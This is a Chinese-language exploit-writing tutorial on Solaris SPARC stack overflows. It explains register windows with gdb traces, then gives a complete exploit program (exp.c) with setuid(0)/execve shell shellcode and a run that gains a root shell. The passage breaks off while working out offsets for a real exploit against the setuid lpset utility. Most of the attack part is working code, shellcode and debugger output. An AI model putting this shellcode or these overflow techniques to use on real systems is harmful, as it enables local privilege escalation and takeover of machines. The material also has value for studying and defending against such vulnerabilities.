◆ Solaris for SPARC 堆栈溢出程序编写(1) 
 
作者：warning3 (warning3@hotmail.com) 
主页：http://www.nsfocus.com/ 
日期：2000-5-5 

    前言：

  众所周知，Solaris系统的缓冲区溢出漏洞可以说是层出不穷，攻击者通常可以很轻易地
  利用这些漏洞获得系统的控制权。但目前似乎很少看到有讲如何在Solaris下编写溢出程
  序的文章，因此我决定写一篇这方面的文章，主要是抛砖引玉，希望能引起一些讨论，共
  同提高，我的目的也就达到了。由于我对SPARC结构也是刚刚开始学习，很多地方都是凭
  自己的理解，错误疏漏之处在所难免，欢迎批评指正。
  
  注: scz已经写了一篇很好的文章，关于编写Solaris (SPARC)下shellcode的。详细介绍
  了shellcode的编写过程，同时对SPARC结构也有非常详尽介绍。如果想了解shellcode编
  写，建议先看一下该文。
  
  本文中所有程序都在 SunOS 5.7/5.6 Generic sun4u sparc SUNW,Ultra-5_10 下测试通过
    
                                                   
      1.  SPARC平台的基本知识
        
         1.1 通用寄存器
         1.2 过程调用机制
         
      2.  普通溢出程序编写
      
         2.1  基本思路    
         2.2  实现方法
         2.3  一个针对vul.c的测试程序exp.c
         2.4  一个实际测试程序的编写过程(lpset -a)
         
      3. 绕过不可执行堆栈保护的溢出程序编写         
      
         3.1  基本思路    
         3.2  一个针对vul.c的测试程序ex_noexec.c
         3.3  不能得到root shell的分析以及解决方法
         3.4  关于假栈帧地址的确定
         3.5  一个实际的例子lpset_nonexec.c
         3.6  利用strcpy()拷贝shellcode
         3.7  一个实际的例子lpset_nonexec1.c
       
      4. 结束语
      
      5. 参考文献


内容：
  
1. SPARC平台的基本知识
   
   SPARC平台和Intel x86有很多不同的地方，为了理解SPARC下的溢出，我们先来了解一下
   SPARC下的寄存器以及过程执行的情况。限于篇幅，这里不可能作非常详尽的介绍，有兴
   趣的朋友可以去查看相关的资料。
   
   1.1 通用寄存器
    
   SPARC包含4组通用寄存器，每组包含8个寄存器。其中一组是全局(global)寄存器,另外三
   组寄存器是out,local,in.每组寄存器的基本构成及作用如下表所示:
      
    
                 %g0  (r00)       始终为0
                 %g1  (r01)  [1]  临时值
                 %g2  (r02)  [2]  
     global      %g3  (r03)  [2]  
                 %g4  (r04)  [2]  
                 %g5  (r05)       保留
                 %g6  (r06)       保留
                 %g7  (r07)       保留

                 %o0  (r08)  [3]  输出参数0/被调函数调用返回值
                 %o1  (r09)  [1]  输出参数1
                 %o2  (r10)  [1]  输出参数2
     out         %o3  (r11)  [1]  输出参数3
                 %o4  (r12)  [1]  输出参数4
                 %o5  (r13)  [1]  输出参数5
            %sp, %o6  (r14)  [1]  堆栈指针
                 %o7  (r15)  [1]  临时数据/CALL指令的地址

                 %l0  (r16)  [3]  local 0
                 %l1  (r17)  [3]  local 1
                 %l2  (r18)  [3]  local 2
     local       %l3  (r19)  [3]  local 3
                 %l4  (r20)  [3]  local 4
                 %l5  (r21)  [3]  local 5
                 %l6  (r22)  [3]  local 6
                 %l7  (r23)  [3]  local 7

                 %i0  (r24)  [3]  输入参数0/返回给主调函数的值
                 %i1  (r25)  [3]  输入参数1
                 %i2  (r26)  [3]  输入参数2
     in          %i3  (r27)  [3]  输入参数3
                 %i4  (r28)  [3]  输入参数4
                 %i5  (r29)  [3]  输入参数5
            %fp, %i6  (r30)  [3]  栈帧指针
                 %i7  (r31)  [3]  ( 返回地址 - 8 )

   其中out,local,in三组寄存器（24个寄存器）组成一个"寄存器窗"。在SPARC中可以包含
   多个寄存器窗。每个过程在执行中都对应一个寄存器窗，称为当前寄存器窗。一个特殊
   寄存器CWP（current window pointer)记录当前的寄存器窗号码。每个寄存器窗的out,in
   寄存器分别等于相邻寄存器窗的in,out寄存器。如下图所示。
   
outs[1]  locals[1]  ins[1]  1号寄存器窗
                    outs[2]   locals[2]  ins[2] 2号寄存器窗
                                        outs[3]   locals[3]  ins[3] 3号寄存器窗
                                                            outs[4] ...

   1.2 过程调用机制
   

   先来看一个简单的问题函数，它是存在缓冲区溢出问题的：
--------------------------------------------------------------------------
/*  
* vul.c
* written by warning3 <warning3@hotmail.com>
*    gcc -o vul vul.c
*/
func ( char * str )
{
    char buf[8];
    strcpy( buf, str );
    printf( "%s\n", buf );
}
int main ( int argc, char * argv[] )
{
    if ( argc > 1 )
    {
        func( argv[1] );
    }
}  /* end of main */

--------------------------------------------------------------------------

   我们来分析一下它的执行过程：
   
[warning3@sun1 ovw]$ gcc -o h vul.c
[warning3@sun1 ovw]$ gdb h
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) disass main
Dump of assembler code for function main:
0x10ad8 <main>:       save  %sp, -112, %sp     ! 分配堆栈空间，保存寄存器l*,i*
0x10adc <main+4>:     st  %i0, [ %fp + 0x44 ]  ! 将参数一:argc 存储到[%fp + 0x44]
0x10ae0 <main+8>:     st  %i1, [ %fp + 0x48 ]  ! 将参数二:argv 存储到[%fp + 0x48]
0x10ae4 <main+12>:    ld  [ %fp + 0x44 ], %o0  ! 将argc装入%o0
0x10ae8 <main+16>:    cmp  %o0, 1              ! 比较是否等于1
0x10aec <main+20>:    ble  0x10b0c <main+52>   ! 如果<=1,返回
0x10af0 <main+24>:    nop                      ! 延迟指令
0x10af4 <main+28>:    mov  4, %o0              ! 令%o0=0x4
0x10af8 <main+32>:    ld  [ %fp + 0x48 ], %o2  ! 将argv指针地址放入%o2
0x10afc <main+36>:    add  %o0, %o2, %o1       ! %o2 + 4 = argv[1]
0x10b00 <main+40>:    ld  [ %o1 ], %o0         ! 将argv[1]的地址付给%o0
0x10b04 <main+44>:    call  0x10aa0 <func>     ! 调用子函数<func>
0x10b08 <main+48>:    nop                      ! 延迟指令
0x10b0c <main+52>:    ret                      ! 返回
0x10b10 <main+56>:    restore                  ! 恢复堆栈
End of assembler dump.
(gdb) b *0x10ad8
Breakpoint 1 at 0x10ad8
(gdb) r aaaaaaaa
Starting program: /space/staff/warning3/ovw/h aaaaaaaa

Breakpoint 1, 0x10ad8 in main ()
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0             0x0      0
i1             0x0      0
i2             0x0      0
i3             0x0      0
i4             0x0      0
i5             0x0      0
fp             0x0      0
i7             0x0      0
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0             0x2      2                <----- 第一个参数: argc = 2 
o1             0xffbefc4c       -4260788 <----- 第二个参数:  argv指针
o2             0xffbefc58       -4260776 <----- 环境变量指针 
o3             0x21998  137624           <----- 指向环境变量指针的指针 **environ 
o4             0x0      0
o5             0x0      0
sp             0xffbefbe8       -4260888 <----- 当前堆栈指针 
o7             0x109bc  68028            <----- 调用main函数的地址:call  0x10ad8 <main>
(gdb) x/x $o1
0xffbefc4c:     0xffbefd40
(gdb) x/s 0xffbefd40 
0xffbefd40:      "/space/staff/warning3/ovw/h"  <---- argv[0]
(gdb) x/x $o1 + 4
0xffbefc50:     0xffbefd5c
(gdb) x/s 0xffbefd5c 
0xffbefd5c:      "aaaaaaaa"               <---- argv[1]
(gdb) x/x $o2
0xffbefc58:     0xffbefd65                <---- 环境变量的起始地址
(gdb) x/5s 0xffbefd65
0xffbefd65:      "PWD=/space/staff/warning3/ovw"
0xffbefd83:      "TZ=PRC"
0xffbefd8a:      "_INIT_RUN_NPREV=0"
0xffbefd9c:      "HZ=100"
0xffbefda3:      "HOSTNAME=sun1.nsfocus.com"
(gdb) x/x $o3  
0x21998 <environ>:      0xffbefc58        <---- 指向%o2所存的地址
(gdb) si                                  <---- 执行:save  %sp, -112, %sp
0x10adc in main ()                                    为main()设置堆栈空间
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7         <---- 将寄存器组out全部换为in
i0             0x2      2
i1             0xffbefc4c       -4260788
i2             0xffbefc58       -4260776
i3             0x21998  137624
i4             0x0      0
i5             0x0      0
fp             0xffbefbe8       -4260888  <---- 原来的%sp变成%fp
i7             0x109bc  68028
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7         <---- 创建新的寄存器组out
o0             0x0      0
o1             0x0      0
o2             0x0      0
o3             0x0      0
o4             0x0      0
o5             0x0      0
sp             0xffbefb78       -4261000  <---- 新的sp(o6)= 原来的sp - 112(0x70)
o7             0x0      0

   这时候save指令已经计算了函数堆栈帧的长度为112字节，因此，将当前堆栈指针前移112
   字节,为保留寄存器以及分配变量留出空间，指向堆栈开头
   
(gdb) x/8xw $sp                           <---- 将l0 - l7存入$sp低端
0xffbefb78:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefb88:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/8xw $sp + 32                      <---- 将i0 - i7存入$sp+32处
0xffbefb98:     0x00000002      0xffbefc4c      0xffbefc58      0x00021998
0xffbefba8:     0x00000000      0x00000000      0xffbefbe8      0x000109bc
                                                                ----、----
                                                                     、_（返回地址-8）
   值得注意的是，l0-l7,i0-i7寄存器的值保存到了main()堆栈的开头处，其中i7保存的值
   是 call <main> 指令的地址，也就是（返回地址-8）。

(gdb) x/2x $fp + 0x44
0xffbefc2c:     0x00000000      0x00000000  
(gdb) si                                  <---- st  %i0, [ %fp + 0x44 ]     
0x10ae0 in main ()
(gdb) x/2x $fp + 0x44                           把参数1(argc)存储到[ %fp + 0x44 ]    
0xffbefc2c:     0x00000002      0x00000000
(gdb) si                                  <---- st  %i1, [ %fp + 0x48 ]
0x10ae4 in main ()                                    
(gdb) x/2x $fp + 0x44                           把参数2(**argv)地址存到[ %fp + 0x48 ]
0xffbefc2c:     0x00000002      0xffbefc4c
  
   我们可以看到一个有趣的现象，main()函数将它的参数放到了%fp + 0x44开始的地址。
   0x44=68=(8 + 8 + 1)*4  , %fp其实是调用main函数之前的堆栈指针，也就是<_start>
   函数的堆栈指针，%fp处存储的是l0-l7,%fp + 32处存储的是i0-i7, %fp + 64处(4个字
   节)是用来存放main()函数的返回值的。而 %fp + 68 开始用来存放 main()函数的参数
   。也就是说：在solaris底下，被调函数的参数是放在主调函数的堆栈栈帧中的。

(gdb) b *0x10b00                          <---- 中间的就不看了，没什么特别
Breakpoint 2 at 0x10b00
(gdb) c
Continuing.

Breakpoint 2, 0x10b00 in main ()
(gdb) i r o0
o0             0x4      4
(gdb) si                                  <---- 将"aaaaaaa"的地址传给%o0 
0x10b04 in main ()                        <---- 下一条指令地址是0x10b04  
(gdb) x/s $o0
0xffbefd5c:      "aaaaaaaa"

(gdb) i r o7
o7             0x0      0                 <---- o7现在是0
(gdb) si                                  <---- 执行call <func>调用 
0x10b08 in main ()
(gdb) i r o7
o7             0x10b04  68356             <---- 现在o7变成了0x10b04：call <func>的地址  
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7
o0             0xffbefd5c       -4260516
o1             0xffbefc50       -4260784
o2             0xffbefc4c       -4260788
o3             0x0      0
o4             0x0      0
o5             0x0      0
sp             0xffbefb78       -4261000
o7             0x10b04  68356
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7
i0             0x2      2
i1             0xffbefc4c       -4260788
i2             0xffbefc58       -4260776
i3             0x21998  137624
i4             0x0      0
i5             0x0      0
fp             0xffbefbe8       -4260888
i7             0x109bc  68028
(gdb) i r pc
pc             0x10b08  68360
(gdb) si                                  <---- 执行延时指令
0x10aa0 in func ()
(gdb) i r pc                              <---- 将%pc设置到<func>开始
pc             0x10aa0  68256
(gdb) si                                  <---- 执行save  %sp, -120, %sp指令
0x10aa4 in func ()
(gdb) i r o0 o1 o2 o3 o4 o5 sp o7         <---- 创建新的寄存器组out
o0             0x0      0
o1             0x0      0
o2             0x0      0
o3             0x0      0
o4             0x0      0
o5             0x0      0
sp             0xffbefb00       -4261120  <---- 将sp指向 sp - 120 
o7             0x0      0
(gdb) i r i0 i1 i2 i3 i4 i5 fp i7         <---- 将out换成in
i0             0xffbefd5c       -4260516
i1             0xffbefc50       -4260784
i2             0xffbefc4c       -4260788
i3             0x0      0
i4             0x0      0
i5             0x0      0
fp             0xffbefb78       -4261000   <----  main()的堆栈指针变成了%fp 
i7             0x10b04  68356              <----  func()的返回地址-8
(gdb) disass func
Dump of assembler code for function func:
0x10aa0 <func>:         save  %sp, -120, %sp
0x10aa4 <func+4>:       st  %i0, [ %fp + 0x44 ]
0x10aa8 <func+8>:       add  %fp, -24, %o1
0x10aac <func+12>:      mov  %o1, %o0
0x10ab0 <func+16>:      ld  [ %fp + 0x44 ], %o1
0x10ab4 <func+20>:      call  0x216f0 <strcpy>
0x10ab8 <func+24>:      nop 
0x10abc <func+28>:      add  %fp, -24, %o1
0x10ac0 <func+32>:      sethi  %hi(0x11400), %o2
0x10ac4 <func+36>:      or  %o2, 0x268, %o0     ! 0x11668 <_lib_version+8>
0x10ac8 <func+40>:      call  0x216fc <printf>
0x10acc <func+44>:      nop 
0x10ad0 <func+48>:      ret 
0x10ad4 <func+52>:      restore 
End of assembler dump.

   从这里我们应该可以看到SPARC函数调用的基本流程了


        主调函数        被调函数
        ------          ------
          main
          *
          *
        call func
        nop -------\
                   | 
                   \---> func: save %sp, -framesize, %sp
                                *
                                *
                                *
                                *
                             ret
                             restore 
                               |
          * <------------------/
          *
          *
          *

   简单介绍一下四个常用指令的功能：
   
   <1> call指令将当前call指令的地址保存到寄存器%o7中,然后将控制转向func()。
       call后面的nop指令是一个延迟操作。当从func()中返回(ret)的时候，应该跳到nop
       后面的地址(%o7+8)去执行,因此，%o7中保存的值是返回地址-8.
  
   <2> save指令完成如下操作：
       1. 计算本调用过程的栈帧大小，根据主调函数的%sp(%o6)计算当前堆栈指针的新地
          址
       2. 将寄存器窗号减一
       3. 再将旧的寄存器"out"改名为"in". 这样，主调函数main的堆栈指针(%sp/%o6)就
          保存到(%fp/%i6)中,func()的返回地址也保存到了%i7中
       4. 然后Save会创建新的"out"和"local"寄存器组，然后将当前堆栈的地址(%sp)保
          存到%o6(注意：这里是被调函数的%o6)中。
       5. 将%l0-%l7保存到(%sp)处，将%i0-%i7保存到(%sp+32)处,
  
   <3> ret指令是个合成指令，等价于jmpl %i7+8, %g0.它将跳转到%i7+8处.由于%i7中保存
       的值是call指令的地址,所以程序就跳到正确的地址(跳过call后面的延迟指令NOP)去
       执行了。
       
   <4> restore也是个合成指令，它将寄存器窗号增加一，然后将"in"寄存器组改名为"out"
       ,并将主调函数保存在堆栈中的%i0-%i7(%fp+32开始)和%l0-%l7(%fp开始)恢复到新的
       "in"和"local"寄存器组中,这样main()的三组寄存器就恢复成原状了。
  
  
   我们再来看一下执行过程调用时堆栈中的内存分配情况:


被调用过程的堆栈（在执行了save指令以后)
================================================

堆栈低址

       ___________ ___________ %sp ( func() )    
%sp    | %l0-%l7  | 8*4    保存func()的%l0-%l7寄存器
       |__________|
%sp+32 | %i0-%i7  | 8*4    保存func()的%i0-%i7寄存器 (%i7包含func()的返回地址)
       |__________|
%sp+64 |返回值地址| 1*4    为下一个被调函数保留的返回值地址空间
       |__________|
%sp+68 | 参数地址 | 6*4    为下一个被调函数保留(前6个)参数的空间
       |__________|
%sp+92 | 参数地址 | n*4    n>=1 如果下一个被调函数的参数>6，多出的参数在这里分配
       |__________|
       |局部变量  |
       |  ....    | n*8    为func()的局部变量分配空间,每8个字节为一个分配单元
       |          | 
       |__________|
       | 临时区域 | 4*4    C编译器用来计算表达式时储存一些临时变量的区域
       |__________|___________ %fp ( main() ) 
%fp    | %l0-%l7  | 8*4    保存main()的%l0-%l7寄存器
       |__________|
%fp+32 | %i0-%i7  | 8*4    保存main()的%i0-%i7寄存器(%i7包含main()的返回地址)
       |__________|
%fp+64 |返回值地址| 1*4    为下一个被调函数(这里是func())保留的返回值地址空间
       |__________|
%fp+68 | 参数地址 | 6*4    为下一个被调函数(这里是func())保留前6个参数的地址空间
       |__________|
%fp+92 | 参数地址 | n*4    n>=1 如果下一个被调函数的参数>6，多出的参数在这里分配
       |__________|
       |局部变量  |
       |  ....    | n*8    为main()的局部变量分配空间,每8个字节为一个单元
       |          | 
       |__________|
       | 保留区域 | 4*4    4个字的保留区域
       |__________|
       | %l0-%l7  |
       |__________|
        .... 
        

堆栈高址

2.  普通溢出程序编写

   2.1  基本思路    

    从前面所讲的函数调用的过程可以知道，我们是不可能覆盖当前函数的返回地址的，因
    为当前函数的返回地址是保存在寄存器%i7中的，然而，我们可以覆盖当前函数的主调
    函数的栈帧，即%fp往后的区域，这里保存有主调函数的%l0-%l7和%i0-%i7.
    以上面的程序为例，只要输入(n*8 + 4*4 + 8*4 + 8*4)个字节长的数据，就可以完全
    覆盖main()函数保存的%l0-%l7和%i0-%i7,这样，当func()执行完restore指令后，就会
    将我们修改过的堆栈内容恢复到in和local寄存器中。而当main()函数执行ret指令返回
    时，就跳到(%i7+8)的地址去运行了，只要在这个地址事先放入我们的shellcode就行了。

    因此，在SPARC平台下面，我们至少需要两次返回才能完成攻击。这和i386下是不一样
    的。这也意味着，如果在main()函数中存在溢出漏洞，你是不可能攻击成功的。因为在
    从main()返回后，通常<_start>会调用<exit>或者<_exit>退出，因此你不可能再修改
    寄存器%i7的值并跳到那里执行。例如，象这样的程序是不可能进行溢出攻击的，有兴
    趣的人可以试一试。

    /*   vul1.c   */               
    int main(int argc, char **argv)
    {                              
       char buf[8];                
                                   
       strcpy(buf,argv[1]);        
    }                              
    /*  end of vul1.c */           

   2.2  实现方法
   
   理解了上面的函数调用的过程之后，那么写攻击程序其实就和Linux很相似了。只要用返
   回地址覆盖保存的%i7就可以了，示意图如下：

   地址   -----------------------------> 高址      
                       %fp       %fp+32            
   -------------------------------------------     
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 |      
   --------------------------------------------    
   | NOPNOP...SHELLCODE|     RET ... RET     |     
   --------------------------------------------    
      ^                                            
      |                        |                   
      \------------------------/                   

   关于SPARC平台下shellcode的编写，可以参看scz的<<solaris for sparc下shellcode的
   编写>>，这里不再赘述。 

   如果buffer比较小，放不下我们的shellcode，有两种方法可以解决: 
   一是将"NOP...NOP..SHELLCODE"部分移到"RET..."后面，

   地址   -----------------------------> 高址
                       %fp       %fp+32 
   ----------------------------------------------------------------
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 | .....               |
   ----------------------------------------------------------------
   | RET    ...       RET        ... RET     | NOPNOP...SHELLCODE |
   ----------------------------------------------------------------
                      |                          ^
                      |                          |
                      \--------------------------/

   二是将shellcode放到环境变量中去，将RET指向环境变量，

   地址   -----------------------------> 高址
                       %fp       %fp+32            environ
   -------------------------------------------    --------------------- 
   | buffer | 保留区域 | %l0-%l7 | %i0 - %i7 |    | .....            |
   -------------------------------------------    --------------------- 
   | RET    ...       RET        ... RET     |    | NOPNOP...SHELLCODE |
   --------------------------------------------   -------------------
                      |                             ^
                      |                             |
                      \-----------------------------/

   采用哪种方法理论上都是可以的。在这里我只举一个例子，使用环境变量来存放我们的
   shellcode.需要注意的问题是，

   (1) 这里的NOP指令是4个字节的指令，这要求我们的返回地址必须指向NOP指令的第一个
       字节在i386中,NOP指令是一个字节，因此，要求并不这么严格)
   (2) NOP指令的起始地址必须在4字节边界上（能被四整除)，否则将导致总线错误。
   (3) 在SPARC平台下,堆栈中buffer的大小是按8的倍数分配的,这是在确定buffer大小的
       时候要注意的。
   
   2.3  一个针对vul.c的测试程序exp.c

   下面是一个测试程序，用来攻击我们前面的vul.c。我们采用execle()执行./vul,使我们
   的环境变量尽可能的少，我们的shellcode将放在堆栈的高端,这个地址是相对固定的，
   比较容易猜测。调整offset(必须是4的倍数)使返回地址落在NOP指令当中，如果该地址不
   与NOP指令的第一个字节对齐，再调整align的值(从0-3即可),使之对齐。


--------------------------------------------------------------------------
/*
* exp.c  -- test exploit for vul.c in Solaris for SPARC .
* gcc -o exp exp.c
*                 by warning3 <warning3@hotmail.com>
*                                            y2k/5/5   
*/

#include <stdio.h>

#define BUFSIZE 8         /* the size of overflowed buffer*/
#define EGGSIZE 1024        /* the egg buffer size */
#define NOP     0xaa1d4015  /* "xor %l5, %l5, %l5" */ 
#define ALIGN   0           /* If don't work ,try adjust align to 0,1,2,3 */
#define OFFSET  1500 


char shellcode[] = /* from scz's funny shellcode for SPARC */ 
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"   /* setuid(0)  */
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" 
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";

/* get current stack point address to guess Return address */
long get_esp(void)   

{
        __asm__("mov %sp,%i0");
} 


main( int argc, char **argv )

{

        char *pattern,eggbuf[EGGSIZE],*env[2];

        long retaddr, i; 
        long bufsize=BUFSIZE, offset=OFFSET, align=ALIGN, patternsize ;
        long  *addrptr;
        
        if( argc > 1 ) align = atoi(argv[1]);
        if( argc > 2 ) offset = atoi(argv[2]);
        if( argc > 3 ) bufsize =  atoi(argv[3]);
        
        
        retaddr = get_esp() + offset; /* Guess return address */
        printf("Usages: %s <align> <offset> <bufsize> \n\n", argv[0] );
        printf("Using RET address = 0x%x  ,Bufsize = %d, Offset = %d, Align= %d\n"
                , retaddr, bufsize, offset, align );

        /* bufsize + reserved area + saved in/local + NULL */ 
        patternsize = bufsize + 4*4 + 16*4 + 1;

        if((pattern = (char *)malloc(patternsize)) == NULL) {
           printf("Can't get enough memory!\n");
           exit(-1);
        }

        memset(pattern, 'C', patternsize );/* fill pattern buffer with garbage */
        addrptr = (long *) (pattern + bufsize + 4*4 ); /* move to saved %l0 */
        
        /* Let's overwrite caller function's saved stack frame  */

        for( i = 0 ; i < 16 ; i ++ )
            *addrptr++ = retaddr;       /* saved (%l0-%l7),(%i0-%i7) */
         
        /* construct shellcode buffer */

        memset(eggbuf,'A',EGGSIZE);   /* fill the eggbuf with garbage */
        for (i = align; i < EGGSIZE; i+=4) { /* fill with NOP */ 
           eggbuf[i+3]=NOP & 0xff;
           eggbuf[i+2]=(NOP >> 8 ) &0xff;
           eggbuf[i+1]=(NOP >> 16 ) &0xff;
           eggbuf[i+0]=(NOP >> 24 ) &0xff;  /* Big endian */ 
        } 
             

         /* Notice : we assume the length of shellcode can be divided exatcly by 4 .
            If not, exploit will fail. Anyway, our shellcode is. ;-)
          */     
         memcpy(eggbuf + EGGSIZE - strlen(shellcode) - 4  + align, shellcode, strlen(shellcode));
         memcpy(eggbuf,"EGG=",4);/* Now : EGG=NOP...NOPSHELLCODE */
         env[0] = eggbuf;    /* put eggbuf in env */
         env[1] = NULL;      /* end of env */
         
         execle("./vul", "./vul",pattern,NULL,env);
}  /* end of main */
--------------------------------------------------------------------------

测试一下：
[warning3@sun1 test]$ ls -l vul exp
-rwxr-xr-x   1 root     other      25664 May  5 10:17 exp
-rwsr-xr-x   1 root     other      24576 May  4 23:25 vul
[warning3@sun1 test]$ id
uid=100(warning3) gid=1(other)
[warning3@sun1 test]$ ./exp
Usages: ./exp <align> <offset> <bufsize> 

Using RET address = 0xffbefe0c  ,Bufsize = 8, Offset = 1500, Align= 0
CCCCCCCCCCCCCCCCCCCCCCCC�峻
                           �峻
                              �峻
                                 �峻
                                    �峻
                                       �峻
                                          �峻
                                             �峻
                                                �峻
                                                   �峻
                                                      �峻
                                                         �峻
                                                            �峻
                                                               �峻
                                                                  �峻
                                                                     �峻
                                                                        C
# id
uid=0(root) gid=1(other)       <----  成功了!
# 


   2.4  一个实际测试程序的编写过程(lpset_sparc.c)

   下面我们以一个实际的例子来详细的讲述怎样写一个攻击程序。在Solaris下lpset被设
   置了suid位，当给它的"-a"开关提供一个很长的参数时，将导致它发生溢出。(这个漏洞
   是日本安全小组The Shadow Penguin Security发现的)
   
   先来看看man lpset:

   NAME
         lpset - set printing configuration in /etc/printers.conf  or
         FNS

   SYNOPSIS
         lpset  [-n system  | fns ]  [ -x  ]   [  -a key=value  ]   [
         -d key ] destination
   ...     
   
   我们看到，"-a"的参数中必须包含一个"="号，否则不能正常工作。

   测试一下：
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x800'` blah
write operation failed        <----- 没有溢出
[root@ /test]> /usr/bin/lpset -n fns -a A=`perl -e 'print "A"x1024'` blah
总线错误 (core dumped)        <----- OK,溢出发生了

[root@ /test]> gdb /usr/bin/lpset core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
<...省略显示内容...>
(no debugging symbols found)...done.
#0  0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
(gdb) bt
#0  0xff3770cc in ns_printer_put () from /usr/lib/libprint.so.2
Cannot access memory at address 0x41414179.
(gdb) i r
<.....>
o0             0x100    256
o1             0xff38a698       -13064552
o2             0x27fa8  163752
o3             0xff3784d0       -13138736
o4             0x100    256
o5             0xff3770c4       -13143868
sp             0xffbef6d0       -4262192   <--- 当前堆栈指针
o7             0xff3770c4       -13143868
l0             0x41414141       1094795585 <--- local和in都已经被恢复成我们填充
l1             0x41414141       1094795585      的数据0x41414141
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0x41414141       1094795585
i7             0x41414141       1094795585
<.....>
pc             0xff3770cc       -13143860 <--- 我们看看程序下一步该干什么了
npc            0xff3770d0       -13143856
<.....>
(gdb) disass 0xff3770cc
<.....>
0xff3770c4 <ns_printer_put+76>: call  %o1
0xff3770c8 <ns_printer_put+80>: mov  %i0, %o0
0xff3770cc <ns_printer_put+84>: ret       <--- 下一步要返回了
0xff3770d0 <ns_printer_put+88>: restore  %g0, %o0, %o0
0xff3770d4 <ns_printer_put+92>: mov  -1, %i0
0xff3770d8 <ns_printer_put+96>: ret 
0xff3770dc <ns_printer_put+100>:        restore 
End of assembler dump.
(gdb) x/32x $sp
0xffbef6d0: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef6e0: 0x41414141      0x41414141      0x41414141      0x41414141<--%l0-%l7
0xffbef6f0: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef700: 0x41414141      0x41414141      0x41414141      0x41414141<--%i0-%i7
0xffbef710: 0x41412220      0x3e2f6465      0x762f6e75      0x6c6c2032
                ------
                      \--- 多了两个字节 
0xffbef720: 0x3e263100      0x00000001      0x00ff0000      0x00011100
0xffbef730: 0x78666e5f      0x7075745f      0x7072696e      0x74657200
0xffbef740: 0x00000000      0xff31e128      0xffbef750      0x00000000

   很明显，程序是在执行完call %o1以后，再执行ret/restore时出错的。我们看到这时候，
   %i0-%i7和%l0-%l7已经被恢复成我们输入的数据。从这里我们其实已经可以测算出我们
   需要的bufsize了，bufsize= (1024 + 2) - 2 - 8*8 - 4*4 = 944字节。
   不过我们还是来确认一下比较好，我们在堆栈中找一找"call %o1"的栈帧，即然我们输
   入的参数长度已经有1026长了，那么我们检查一下当前%sp-1200前都有些什么内容：
   
(gdb) x/1000x $sp-1200
0xffbef240: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef250: 0x41414141      0x41414141      0x41414141      0x41414141
0xffbef260: 0x7ffffbac      0xffbef723      0xff3375e0      0xff3375d8

0xffbef270: 0x41414141      0x2200cd08      0xff000000      0x00ff0000
\--------- 上一个被调函数的栈帧起始地址
0xffbef280: 0x0000ff00      0x01010100      0x00000000      0x00000000<--%l0-%l7
0xffbef290: 0x000252c0      0xff38a698      0x00027fa8      0xff3784d0
0xffbef2a0: 0x00000100      0xff3770c4      0xffbef6d0      0xff3770c4<--%i0-%i7
                                                \---------- 我们的当前堆栈指针
0xffbef2b0: 0x000229d0      0xffbef2d0      0x00000000      0xff38b630
0xffbef2c0: 0xff38b64c      0x00026220      0x00027fa8      0x00000002<--参数域
0xffbef2d0: 0x2f757372      0x2f62696e      0x2f666e63      0x72656174
\---------- 局部变量起始地址    
0xffbef2e0: 0x655f7072      0x696e7465      0x72202d73      0x20746869
0xffbef2f0: 0x736f7267      0x756e6974      0x2f736572      0x76696365
0xffbef300: 0x2f707269      0x6e746572      0x20626c61      0x68202022
0xffbef310: 0x413d4141      0x41414141      0x41414141      0x41414141
\---------- 我们输入的参数的起始地址          
<......>

   我们很容易就找到了上一个被调函数的栈帧位置(0xffbef270),局部变量的起始地址
   是0xffbef2d0,而我们输入的参数被放到了0xffbef310处，让我们看得更清楚一点:

(gdb) x/10s 0xffbef2d0
0xffbef2d0:      "/usr/bin/fncreate_printer -s thisorgunit/service/printer blah  \"A="
                , 'A' <repeats 134 times>...
0xffbef398:      'A' <repeats 200 times>...
0xffbef460:      'A' <repeats 200 times>...
0xffbef528:      'A' <repeats 200 times>...
0xffbef5f0:      'A' <repeats 200 times>...
0xffbef6b8:      'A' <repeats 90 times>, "\" >/dev/null 2>&1"
0xffbef724:      ""
0xffbef725:      ""
0xffbef726:      ""
0xffbef727:      "\001"

   这样我们就可以得到准确的bufsize了,bufsize=(0xffbef6d0-0xffbef310) - 4*4 = 944
   ,和前面推算的吻合。另外需要注意的是：
   我们看到"blah"是我们输入的打印机名称，它被放到了"\"A=AA...A\"前面，因此，如果
   打印机名称长度有变化,将导致整个"\"A=AA...A\"往高址方向移动，因此实际填充的字
